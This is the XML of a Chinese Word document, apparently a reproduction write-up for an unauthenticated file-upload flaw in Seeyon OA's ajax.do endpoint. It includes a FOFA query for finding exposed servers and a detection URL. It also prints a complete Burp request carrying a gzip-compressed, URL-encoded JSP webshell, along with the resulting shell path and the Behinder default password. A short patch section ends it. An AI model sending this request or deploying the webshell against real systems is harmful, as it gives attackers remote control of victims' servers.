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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>致远OA-ajax.do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shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>未授权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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>任意文件上传getshell</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2043430"/>
            <wp:effectExtent l="0" t="0" r="635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10"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5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333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一、漏洞介绍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default" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="宋体" w:cs="Microsoft YaHei UI"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5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致远OA是一套办公协同管理软件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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>近日，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致远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OA ajaxAction 文件上传漏洞利用代码披露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,由于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致远OA旧版本中某些接口存在未授权访问，以及部分函数过滤不足，攻击者通过构造恶意请求，可在无需登录的情况下上传恶意脚本，从而控制服务器。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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目前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致远OA官方已针对该漏洞提供补丁。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如果存在此漏洞，还请尽快修复。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9"/>
          <w:szCs w:val="19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333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>二、影响版本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致远OA V8.0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  致远OA V7.1、V7.1SP1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  致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3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  致远OA V6.0、V6.1SP1、V6.1SP2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  致远OA V5.x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   致远OA G6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10"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/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333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>漏洞复现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1、FOFA语句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title=="致远A8+协同管理软件 V8.0SP1"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21280"/>
            <wp:effectExtent l="0" t="0" r="317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2、判断是否存在漏洞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https://xxx.xxx.xxx.xxx/seeyon/thirdpartyController.do.css/..;/ajax.do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="18103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cs="宋体"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5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i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3、利用工具可生成payload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3F3F3F"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF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3F3F3F"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成的payrload主要是把shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="3F3F3F"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>做了gzip数据的压缩然后在进行 url的编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="27400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burp发送如下数据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/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&amp;managerName=formulaManager&amp;requestCompress=gzip HTTP/1.1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127.0.0.1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max-age=0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Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52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Sec-Fetch-Site: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Sec-Fetch-Mode: navigate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Sec-Fetch-User: ?1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Sec-Fetch-Dest: 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loginPageURL=; login_locale=zh_CN;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Method=validate&amp;arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="282829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(2):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访问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webshell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页面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https://xxx.xxx.xxx.xxx/seeyon/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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>txf1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.jspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1673225"/>
            <wp:effectExtent l="0" t="0" r="635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(3):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成功连接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webshell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冰蝎3的默认密码 : rebeyond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0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>webshell地址: http://127.0.0.1/seeyon/SeeyouUpdate1.jspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="4387215"/>
            <wp:effectExtent l="0" t="0" r="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</w:rPr>
        <w:t>四、漏洞修复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9"/>
          <w:szCs w:val="19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</w:rPr>
        <w:t>升级到安全版本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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2、或者安装补丁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5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http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&amp;id=1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EEBAB3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FCEEBAB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A7566"/>
    <w:rsid w:val="0AE26A12"/>
    <w:rsid w:val="0E8D6C3B"/>
    <w:rsid w:val="0F2A4C2F"/>
    <w:rsid w:val="0FD63DB2"/>
    <w:rsid w:val="10A06DD3"/>
    <w:rsid w:val="151823AB"/>
    <w:rsid w:val="18493677"/>
    <w:rsid w:val="196E4D60"/>
    <w:rsid w:val="1A7E7B8F"/>
    <w:rsid w:val="1E0E7983"/>
    <w:rsid w:val="1EB2456C"/>
    <w:rsid w:val="24363CCF"/>
    <w:rsid w:val="254B1D6C"/>
    <w:rsid w:val="26C57C68"/>
    <w:rsid w:val="34336246"/>
    <w:rsid w:val="37EA5B1B"/>
    <w:rsid w:val="3E0E6B7A"/>
    <w:rsid w:val="3EA725BB"/>
    <w:rsid w:val="40BC7838"/>
    <w:rsid w:val="41C40483"/>
    <w:rsid w:val="4317309B"/>
    <w:rsid w:val="43355C96"/>
    <w:rsid w:val="44901833"/>
    <w:rsid w:val="46F36A83"/>
    <w:rsid w:val="4B315357"/>
    <w:rsid w:val="4C27393B"/>
    <w:rsid w:val="4FF53863"/>
    <w:rsid w:val="50833EE5"/>
    <w:rsid w:val="53CE5E7F"/>
    <w:rsid w:val="54F30458"/>
    <w:rsid w:val="557C5062"/>
    <w:rsid w:val="596D6153"/>
    <w:rsid w:val="59787300"/>
    <w:rsid w:val="5A335A60"/>
    <w:rsid w:val="5A54781B"/>
    <w:rsid w:val="5A5A6093"/>
    <w:rsid w:val="5ECE2574"/>
    <w:rsid w:val="6B110B88"/>
    <w:rsid w:val="6B9C4A76"/>
    <w:rsid w:val="6E3B6733"/>
    <w:rsid w:val="72681881"/>
    <w:rsid w:val="764213CF"/>
    <w:rsid w:val="767B7DE7"/>
    <w:rsid w:val="7EA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2021-03-25T10:15:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-30T14:40:47Z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